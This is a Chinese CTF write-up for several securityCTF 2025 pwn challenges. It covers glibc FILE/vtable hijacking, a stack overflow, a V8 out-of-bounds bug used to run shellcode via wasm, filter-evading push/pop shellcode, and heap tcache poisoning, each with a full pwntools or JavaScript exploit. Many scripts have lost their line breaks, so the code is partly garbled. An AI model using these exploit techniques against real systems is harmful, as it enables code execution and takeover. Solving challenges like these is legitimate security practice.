当前位置: 首页 > news >正文

securityCTF 2025 pwn方向题解

V-table

手挖io链子

正常的链子
exit_handler() -> io_flush_all() -> io_overflow() -> io_do_write()

我们修改vtable,使得调用overflow变成调用file_finish,正常的finish链子
exit_handler() -> io_file_finish() -> io_do_write()

而实际上我们修改了vtable,finish的位置在overflow-8,因此do_write对应的虚函数也要-8
exit_handler() -> io_file_finish() -> io_do_read()

于是我们就拿到了一个任意写
接下来写chains并打house of cat即可

from pwn import *
filename = './main'
libc = ELF("./libc.so.6")
host= 'pwn-14caf623.p1.securinets.tn'
port= 9002sla = lambda x,s : p.sendlineafter(x,s)
sl = lambda s : p.sendline(s)
sa = lambda x,s : p.sendafter(x,s)
s = lambda s : p.send(s)e = ELF(filename)
context.log_level='debug'
context(arch=e.arch, bits=e.bits, endian=e.endian, os=e.os)def run(mode, script = ""):if "d" in mode:p = gdb.debug(filename, script)elif "l" in mode:p = process(filename)elif "r" in mode:p = remote(host, port)elif "a" in mode:p = process(filename)gdb.attach(p, script)return pdef getp():global scriptif len(sys.argv) == 2:p = run(sys.argv[1], script)else:p = run("l", script)return pscript = '''
b _IO_flush_all
b *(&_IO_flush_all+210)
b _IO_switch_to_wget_mode
go
'''def pwn():global pp = getp()p.recvuntil('0x')libcbase = int(p.recv(12), 16) - libc.sym['_IO_2_1_stdout_']libc.address = libcbasejump = libc.sym['_IO_file_jumps']stdin = libc.sym['_IO_2_1_stdin_']stdout = libc.sym['_IO_2_1_stdout_']print(hex(stdout))file = flat({0x0:0xfbad1800,0x8:[stdout + 0x801, stdout, stdout+0x800],0x20:[stdout, stdout - 0x800, stdout],0x68:stdout - 0x10,0x88:stdout + 0x1f0,0xb0:0,0xc8:jump-8,0x78:stdout + 0x1f0,0x90:stdout}, filler = b'\x00')pay = bytes(file)s(pay)fake_io=stdout+0x100IO_wfile_jumps=libc.sym['_IO_wfile_jumps']saddr=libc.sym['system']binsh=libc.search('/bin/sh').__next__()magic=0x0000000000154720+libcbaseIO_wfile_jumps=libc.sym['_IO_wfile_jumps']setcontext_61=libc.sym['setcontext']+53rdi=libc.search(asm("pop rdi;ret"),executable=True).__next__()rax=libc.search(asm("pop rax;ret"),executable=True).__next__()rsi=libc.search(asm("pop rsi;ret"),executable=True).__next__()sys_ret=libc.search(asm("syscall;ret"),executable=True).__next__()ret=rdi +1saddr=libc.sym['system']Rop=p64(rdi)+p64(binsh)+p64(saddr)orw=p64(setcontext_61)+p64(rdi)+p64(0xFFFFFF9C)# 0x0    rdi             0x8   _IO_read_ptr# 0x10  _IO_read_end     0x18  _IO_read_base# 0x20  _IO_write_base   0x28  _IO_write_ptr# 0x30  _IO_write_end    0x38  _IO_buf_base# 0x40  _IO_buf_end      0x48  _IO_save_base# 0x50  _IO_backup_base  0x58  _IO_save_end# 0x60  _markers         0x68  _chain# 0x70  _fileno          0x74  _flags2# 0x78  _old_offset      0x80  _cur_column# 0x82  _vtable_offset   0x83  _shortbuf# 0x88  _lock            0x90  _offset# 0x98  _codecvt         0xa0  _wide_data# 0xa8  _freeres_list    0xb0  _freeres_buf# 0xb8  __pad5           0xc0  _mode# 0xc4  _unused2         0xd8  vtable# magic:0x176f0e : mov rdx, qword ptr [rax + 0x38] ; mov rdi, rax ; call qword ptr [rdx + 0x20]cat=flat({0x0:[b'./flag.txt'],     # rdi=binsh0x20:[p64(0)],            # write_base0x28:[p64(1)],            # write_ptr --> ptr > base0xc0:[p64(0)],            # _mode <= 00xd8:[p64(IO_wfile_jumps+0x30)],0x88:[p64(fake_io+0x90),p64(0),p64(1)],   # bypass lock0xA0:[p64(fake_io+0xA8),p64(0),p64(1)],(0xA0+0x20):[p64(0)],(0xA0+0x28):[p64(1)],            # bypass check in wfile_seekoff(0xA0+0x30):[p64(1)],            # bypass check in wfile_seekoff(0xB0+0xd8):[p64(fake_io+0xB0+0xd8)], # fake wfile vtable(0xB0+0xd8+0x18):[p64(magic)],   # call entry(0xB0+0xd8+0x18+0x20):[p64(fake_io+0xB0+0xd8+0x18+0x28)],(0xB0+0xd8+0x18+0x48):[p64(setcontext_61)],(0x1C8+0xA0):[p64(fake_io+0x280)],    # rsp(0x1C8+0x68):[p64(0xffffff9c)],       # rdi(0x1C8+0xA8):[p64(rax)],              # ret_addr(0x1C8+0x88):[p64(0x100)],            # rdx(0x1C8+0x70):[p64(fake_io)],          # rsi(0x280):[p64(0x101),p64(sys_ret),            # ropp64(rdi),p64(3),p64(rax),p64(0x0),p64(sys_ret),p64(rax),p64(0x1),p64(rdi),p64(0x1),p64(sys_ret),]},filler=b'\x00')file = flat({0x58:stdout + 0x100,0x88:stdout + 0x1f0,0xb0:0,0xc8:jump - 8,0x78:stdout + 0x1f0,0x90:fake_io}, filler = b'\x00')pay = bytes(file).ljust(0x100, b'\x00') + bytes(cat)s(pay)# write_ptr < write_base (avoid crash in switch to get mode)
# mode > 0 (trigger IO_overflow)
# _wide_data->_IO_write_ptr> _wide_data->_IO_write_base (trigger IO_overflow)
# # A0 -> 18 less than A0 -> 20
# read from _IO_buf_base to _IO_buf_end# ignore that# io flush out# 0x0    rdi             0x8   _IO_read_ptr
# 0x10  _IO_read_end     0x18  _IO_read_base
# 0x20  _IO_write_base   0x28  _IO_write_ptr
# 0x30  _IO_write_end    0x38  _IO_buf_base
# 0x40  _IO_buf_end      0x48  _IO_save_base
# 0x50  _IO_backup_base  0x58  _IO_save_end
# 0x60  _markers         0x68  _chain
# 0x70  _fileno          0x74  _flags2
# 0x78  _old_offset      0x80  _cur_column
# 0x82  _vtable_offset   0x83  _shortbuf
# 0x88  _lock            0x90  _offset
# 0x98  _codecvt         0xa0  _wide_data
# 0xa8  _freeres_list    0xb0  _freeres_buf
# 0xb8  __pad5           0xc0  _mode
# 0xc4  _unused2         0xd8  vtable
# magic:0x176f0e : mov rdx, qword ptr [rax + 0x38] ; mov rdi, rax ; call qword ptr [rdx + 0x20]pwn()
p.interactive()

PixPin_2025-10-06_19-11-12

一条亟待复现的链子
_IO_cleanup-> _IO_unbuffer_all->_IO_new_file_setbuf->_IO_default_setbuf->_IO_new_file_sync->_IO_do_flush-> _IO_wdo_write->__libio_codecvt_out

哦就是apple,不过我还没研究过,有时间再说

from pwn import *chal = ELF('./main_patched')HOST = 'pwn-14caf623.p1.securinets.tn'
PORT =  9002gdbscript='''
dir ~/glibc
b *vuln +54
c
'''context.binary = chal
context.terminal = ["tmux", "splitw", "-h"]if args.GDB:conn = gdb.debug([chal.path], gdbscript)
elif args.REMOTE:conn = remote(HOST, PORT)
else:conn = process([chal.path])def main():conn.recvuntil(b': ')addr_stdout = int(conn.recvline().strip(), 0x10)# FIXMEaddr_libc_base = addr_stdout - 0x1e85c0addr_system = addr_libc_base + 0x53110addr_stdfile_1_lock = addr_libc_base + 0x1e97b0addr_gadget = addr_libc_base + 0x001563c3 # add rdi, 0x10; jmp rcx;info(f'{addr_stdout = :#x}')info(f'{addr_libc_base = :#x}')info(f'{addr_system = :#x}')info(f'{addr_stdfile_1_lock = :#x}')info(f'{addr_gadget = :#x}')payload = flat({    0x0: 1, #  _flags0x8: addr_system + 0x4,             # _IO_read_ptr (_wide_data->_IO_write_base),0x10: addr_system + 0x3,            #_IO_read_end (_wide_data->_IO_write_ptr)0x20: 0,                            # _IO_write_base (_codecvt->__cd_out->step->__shlib_handle)0x28: 1,                            # _IO_write_ptr0x30: b'/bin/sh\0',                 # rdi + 0x100x38: 0,                            # _IO_buf_base (_wide_data->_IO_backup_base)0x48: addr_gadget,                  # _IO_save_base (_codecvt->__cd_out->step->__fct)0x50: 0,                            # _IO_backup_base0x58: addr_stdout + 0x20,           # _IO_save_end (_codecvt->__cd_out->step) +0x60, +0x68, +0x80 will be overwitten0x88: addr_stdfile_1_lock,          # _lock0x98: addr_stdout + 0x58 - 0x38,    # _codecvt0xa0: addr_stdout + 0x8 - 0x18,     # _wide_data0xc0: 1,  # _mode}, filler=b'\0', length=0xd8)conn.send(payload)conn.interactive()if __name__ == '__main__':  main()

Zip++

zip,但是压缩算法不好
所以有个栈溢出控制到win就结束了

from pwn import *
filename = './main'
# libc = ELF("./libc.so.6")
host= 'pwn-14caf623.p1.securinets.tn'
port= 9000sla = lambda x,s : p.sendlineafter(x,s)
sl = lambda s : p.sendline(s)
sa = lambda x,s : p.sendafter(x,s)
s = lambda s : p.send(s)e = ELF(filename)
context.log_level='debug'
context(arch=e.arch, bits=e.bits, endian=e.endian, os=e.os)def run(mode, script = ""):if "d" in mode:p = gdb.debug(filename, script)elif "l" in mode:p = process(filename)elif "r" in mode:p = remote(host, port)elif "a" in mode:p = process(filename)gdb.attach(p, script)return pdef getp():global scriptif len(sys.argv) == 2:p = run(sys.argv[1], script)else:p = run("l", script)return pscript = '''
go
'''def pwn():global pp = getp()pay = b'\x01\x02' * 198 + b'\xa6' *0x11sa(':',pay)sa(':','exit')pwn()
p.interactive()

Sukunahikona

一个简单的v8题

var _b = new ArrayBuffer(16);
var _f = new Float64Array(_b);
var _i = new BigUint64Array(_b);
function f2i(f)
{_f[0] = f;return _i[0];
}
function i2f(i)
{_i[0] = i;return _f[0];
}
function phex(i)
{console.log("[HEX]: 0x"+i.toString(16).padStart(16,"0"));
}let arr = [1.1, 2.2, 3.3, 4.4, 5.5, 6.6, 7.7, 8.8, 9.9, 10.10, 11.11, 12.12, 13.13, 14.14, 15.15, 16.16, 17.17, 18.18, 19.19, 20.20];
let obj_arr = [{}, {}, {}];
let evil_len = {valueOf: function() {// arr.push({}); // Change the array to HOLEY_ELEMENTS array if neededarr.length = 2;return 19;}
};arr.shrink(evil_len);new ArrayBuffer(0xfe000000);
new ArrayBuffer(0xfe000000);
new ArrayBuffer(0xfe000000);
// %DebugPrint(arr);
// const map_value = arr[2];
function show_arr()
{for (let i = 0; i < arr.length; i++) {phex(f2i(arr[i]));}
}
function addr_of(obj)
{obj_arr[2] = obj;return f2i(arr[6]) & 0xffffffffn;
}function read32_at(addr)
{arr[7] = i2f(((addr-8n) << 32n) | 0x725n);arr[8] = i2f((0x2n << 32n) | (0x2n));return f2i(obj_arr[0][0]);  
}function write32_at(addr, val)
{arr[7] = i2f(((addr-8n) << 32n) | 0x725n);arr[8] = i2f((0x2n << 32n) | (0x2n));obj_arr[0][0] = i2f(val);
}function pwn()
{darr_map = f2i(arr[2]);oarr_map = f2i(arr[17]);darr_addr = (f2i(arr[3]) + 8n) & 0xffffffffn;oarr_addr = darr_addr + 0x28n;obj0_addr = oarr_addr + 0xcn;phex(obj0_addr);phex(oarr_map);arr[6] = i2f((darr_map & 0xffffffffn) << 32n);// arr[7] = i2f((darr_map >> 32n) | )var data_buf = new ArrayBuffer(0x400);var data_view = new DataView(data_buf);backing = addr_of(data_buf) + 0x24n;haddr = read32_at(backing);phex(backing);phex(haddr);// %DebugPrint(data_buf);// %DebugPrint(data_view);// %DebugPrint(arr);var wasmCode = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);var wasmModule = new WebAssembly.Module(wasmCode);var wasmInstance = new WebAssembly.Instance(wasmModule, {});var f = wasmInstance.exports.main;f_addr = addr_of(f);instance_addr = read32_at(f_addr + 0x10n) & 0xffffffffn;function_data_addr = read32_at(instance_addr + 4n) & 0xffffffffn;instance_data = read32_at(function_data_addr + 0x14n) & 0xffffffffn;rwx = read32_at(instance_data + 0x30n);phex(f_addr);phex(instance_addr);phex(function_data_addr);phex(instance_data);phex(rwx);write32_at(backing, rwx);// %DebugPrint(data_buf);shellcode = [
0x2434810101757968n,
0x2f66b84801010101n,
0x4850742e67616c66n,
0x632f656d6f682fb8n,
0x31d231e789485074n,
0xc031050f58026af6n,
0x4801b6d2315f036an,
0x315f016a050fe689n,
0x16ae6894801b6d2n,
0x50f58n,];for (let i = 0; i < shellcode.length; ++i){data_view.setFloat64(i * 8, i2f(shellcode[i]), true);}f();
}
pwn()
while(1) {}

push pop all

在里面藏个bad就会阻断cs的解析

然后我们用push pop指令再把bad指令写掉,就能正常执行后面的shellcode了

from pwn import *
import base64
context.arch = 'amd64'
context.log_level = 'debug'host = '127.0.0.1'
port = 1337host = 'pwn-14caf623.p1.securinets.tn'
port = 9001def pwn():p = remote(host, port)shellcode = asm('pop rax')*8shellcode += asm('push r11; pop rsp; pop rax; pop rbx; push rax;') + b'\x60'shellcode += asm('nop; nop; add rsp, 0x800;' + shellcraft.sh())shellcode = base64.b64encode(shellcode)p.sendline(shellcode)p.interactive()p.close()pwn()

push pop all revenge

我不喜欢这道题 TvT

用 search -2 050f找syscall,然后pop到寄存器里再push到rwx
或者用canary 1/256拿 0xf

长度有0x2000,足够我们pop来搜索

search -w -2 ...

PixPin_2025-10-07_14-23-22

这是第一种办法,肉眼查找法。第一种办法的优化是自己编写一个gdb脚本,将search的结果与栈上指针比对,最后找到一个可以获得0x50f的办法

第二种办法是用pop sp修改rsp的低位,之前我只知道64位下没有pop eax...但是没想到原来可以pop ax...

用pop sp 修改 rsp低位为7,然后pop到0x507即可

第三种做法是控制code的长度,填充我们的shellcode使其长度为0x507,然后找到我们code的源代码,再反照对象的引用路径,最后在栈上找到能跑过去的链子

PixPin_2025-10-07_14-42-56

PixPin_2025-10-07_14-43-12

咕咕嘎嘎.mp4
(不过这里在栈更高位的地方上不去)
(但是pop sp疑似就上去了)

from pwn import *
from base64 import *
filename = "/bin/python"
# libc = ELF("./libc.so.6")
host= 'pwn-14caf623.p1.securinets.tn'
port= 9090# host = '127.0.0.1'
# port = 1337sla = lambda x,s : p.sendlineafter(x,s)
sl = lambda s : p.sendline(s)
sa = lambda x,s : p.sendafter(x,s)
s = lambda s : p.send(s)e = ELF(filename)
context.log_level='debug'
context(arch=e.arch, bits=e.bits, endian=e.endian, os=e.os)def run(mode, script = ""):p = remote(host, port)return pdef getp():global scriptif len(sys.argv) == 2:p = run(sys.argv[1], script)else:p = run("l", script)return pscript = '''
go
'''def pwn():global pp = getp()shellcode = asm('pop rcx; pop rcx; pop rcx;')shellcode += asm('pop rsp; pop rcx; pop rcx; pop rcx; pop rsp;') + asm('pop rbx')* 397 + asm('pop rsp; pop rcx; pop rcx; pop rcx;')shellcode += asm('pop rcx; pop rsp; pop rcx; pop rcx; pop rbx; push r11; pop rsp;')shellcode += asm('pop rcx; push rsp; pop rsi') + asm('pop rcx') * 0x40 + asm('push rbx; pop rdx')shellcode = shellcode.ljust(0x50f, asm('pop rcx'))shellcode = b64encode(shellcode)sla('Shellcode : ', shellcode)# sleep(10)shellcode = b'\x90'*0x220 + asm('add rsp, 0x800;' + shellcraft.sh())s(shellcode)# p.recv(1, timeout=2)# shellcode = b'\x90'*0x520 + asm('add rsp, 0x800;') + asm(shellcraft.write(1, 'rsp', 0x100))# sleep(0.5)# sl(shellcode)# p.interactive()# p.recv(1)
pwn()
p.interactive()

记得控制rdx不要太大

spell manage

简单的堆题,给了个任意申请

from pwn import *
filename = './main'
libc = ELF("./libc.so.6")
host= ''
port= 0sla = lambda x,s : p.sendlineafter(x,s)
sl = lambda s : p.sendline(s)
sa = lambda x,s : p.sendafter(x,s)
s = lambda s : p.send(s)e = ELF(filename)
context.log_level='debug'
context(arch=e.arch, bits=e.bits, endian=e.endian, os=e.os)def run(mode, script = ""):if "d" in mode:p = gdb.debug(filename, script)elif "l" in mode:p = process(filename)elif "r" in mode:p = remote(host, port)elif "a" in mode:p = process(filename)gdb.attach(p, script)return pdef getp():global scriptif len(sys.argv) == 2:p = run(sys.argv[1], script)else:p = run("l", script)return pscript = '''
go
'''def add(idx, content):    s = content.ljust(0x6c, b'\x00')sla(': ', '1')sla(': ', str(idx))sa(': ', s[0:0x20])sa(': ', s[0x20:0x60])sla(':', str(u32(s[0x60:0x64])))sla(':', str(u32(s[0x64:0x68])))sla(':', str(u32(s[0x68:0x6c])))def edit(idx, content):s = content.ljust(0x6c, b'\x00')sla(': ', '2')sla(': ', str(idx))sa(': ', s[0:0x20])sa(': ', s[0x20:0x60])sla(':', str(u32(s[0x60:0x64])))sla(':', str(u32(s[0x64:0x68])))sla(':', str(u32(s[0x68:0x6c])))def show():sla(':', '3')def free(idx):sla(':', '4')sla(':', str(idx))def pwn():global pp = getp()for i in range(0, 7):add(i, b'')free(i)show()p.recvuntil('Slot 0:\n  Name:')haddr = u64(p.recv(6)+b'\x00\x00')*0x10 + 0x90tkey = haddr >> 12add(8, b'')add(9, b'')for i in range(0, 11):add(10 + i, b'')free(8)free(9)edit(0, b'\x00'*0x58+p64(0x81)+p64(tkey))edit(9, p64(tkey ^ (haddr + 0x60)))add(8, b'')add(9, b'\x00'*0x18 + p64(0x481))free(1)show()p.recvuntil('Slot 1:\n  Name: ')libcbase = u64(p.recv(6)+b'\x00\x00') - 0x203b20for i in range(0, 5):add(11 + i, b'')add(12, p64(tkey ^ (libcbase+libc.sym['_IO_list_all'])))fake_io = haddr + 0x390IO_wfile_jumps=libcbase+libc.sym['_IO_wfile_jumps']setcontext_61=libcbase+libc.sym['setcontext']+61rdi=libcbase+0x000000000010f75brax=libcbase+0x00000000000dd237rsi=libcbase+0x0000000000110a4dsys_ret=libcbase+0x000000000098FC5ret=libcbase+0x000000000010f75b+1saddr=libcbase+libc.sym['system']binsh=libcbase+libc.search('/bin/sh').__next__()Rop=p64(rdi)+p64(binsh)+p64(saddr)orw=p64(setcontext_61)+p64(rdi)+p64(0xFFFFFF9C)# 0x0    rdi             0x8   _IO_read_ptr# 0x10  _IO_read_end     0x18  _IO_read_base# 0x20  _IO_write_base   0x28  _IO_write_ptr# 0x30  _IO_write_end    0x38  _IO_buf_base# 0x40  _IO_buf_end      0x48  _IO_save_base# 0x50  _IO_backup_base  0x58  _IO_save_end# 0x60  _markers         0x68  _chain# 0x70  _fileno          0x74  _flags2# 0x78  _old_offset      0x80  _cur_column# 0x82  _vtable_offset   0x83  _shortbuf# 0x88  _lock            0x90  _offset# 0x98  _codecvt         0xa0  _wide_data# 0xa8  _freeres_list    0xb0  _freeres_buf# 0xb8  __pad5           0xc0  _mode# 0xc4  _unused2         0xd8  vtable# magic:0x176f0e : mov rdx, qword ptr [rax + 0x38] ; mov rdi, rax ; call qword ptr [rdx + 0x20]pay=flat({0x0:[b'/bin/sh\x00'],     # rdi = binsh0x20:[p64(0)],            # write_base0x28:[p64(1)],            # write_ptr --> ptr > base0x48:[p64(saddr)],0xc0:[p64(0)],            # _mode <= 00xd8:[p64(IO_wfile_jumps+0x30)],0x88:[p64(fake_io+0x90),p64(0),p64(1)],   # bypass lock0xA0:[p64(fake_io-0x10)],         # bypass check in wfile_seekoff0x10:[p64(1)],0x18:[p64(0)],# (0xB0+0xd8):[p64(fake_io+0xB0+0xd8)], # fake wfile vtable(0xc8):[p64(fake_io+0xd0-0x18)],   (0xd0):[p64(fake_io+0x30)],   # call entry}, filler=b'\x00')add(12, bytes(pay)[0:0x68])add(13, bytes(pay)[0x80:0xe0])sla(':', '5')sla(':', str(0x78))sla(':', p64(0))sla(':', '5')sla(':', str(0x78))sla(':', p64(fake_io))print(hex(libcbase))print(hex(haddr))pwn()
p.interactive()

改_IO_list_all结束

http://www.hskmm.com/?act=detail&tid=28958

相关文章:

  • 02020507 EF Core高级07-悲观并发控制、乐观并发控制、EF Core连接MySQL、RowVersion
  • linux防火墙操作命令
  • 02020506 EF Core高级06-EF Core批量删除更新插入、全局筛选器、软删除、全局筛选的性能问题
  • 机器学习社会影响与导航系统研究
  • ubuntu24.04 desktop 安装vnc远程桌面(亲测)
  • 完整教程:游标查询在对话历史场景下的独特优势
  • [论文笔记] A Contemporary Survey of Large Language Model Assisted Program Analysis
  • 251011
  • 一种整理HTML和JS代码的方法
  • 元推理框架,是人类文明的《神农本草经》,源于自指自洽的觉悟与洗礼
  • SSL/TLS加密算法:守护网络通信的安全框架
  • 未来计划
  • 【程序员必看】MySQL数据类型全解析:选错类型性能直接掉80%!
  • NOIP2023
  • 理解WPF Stylet中Command=“{s:Action 方法名}“的设计与实现 - 实践
  • 2025环氧地坪漆厂家推荐:常州新禾,品质保证施工无忧!
  • 概率论习题
  • 2025上海经侦律师TOP5榜单:专业法律服务与高效解决方案
  • 概率论部分习题
  • 2025家居ERP推荐:赛思软件助力企业高效管理!
  • 2025彩钢瓦保养优质厂家推荐,江苏承优建筑工程专业服务!
  • 优维科技一面
  • 2025家纺摄影公司最新推荐榜:创意视觉与专业服务的完美结合
  • 2025磁力泵加工厂推荐中正化工,专业定制高效耐用产品!
  • 线段树分治
  • 2025双氧水供应厂家推荐:苏州市岚昱化工品质卓越选择!
  • 2025婚纱照拍摄推荐,南通造物摄影有限公司专业团队打造梦幻
  • 2025上海保洁公司最新推荐榜:高效清洁与贴心服务的优质选择
  • 10.11
  • 「解题报告」蓝桥杯2013省AB 错误票据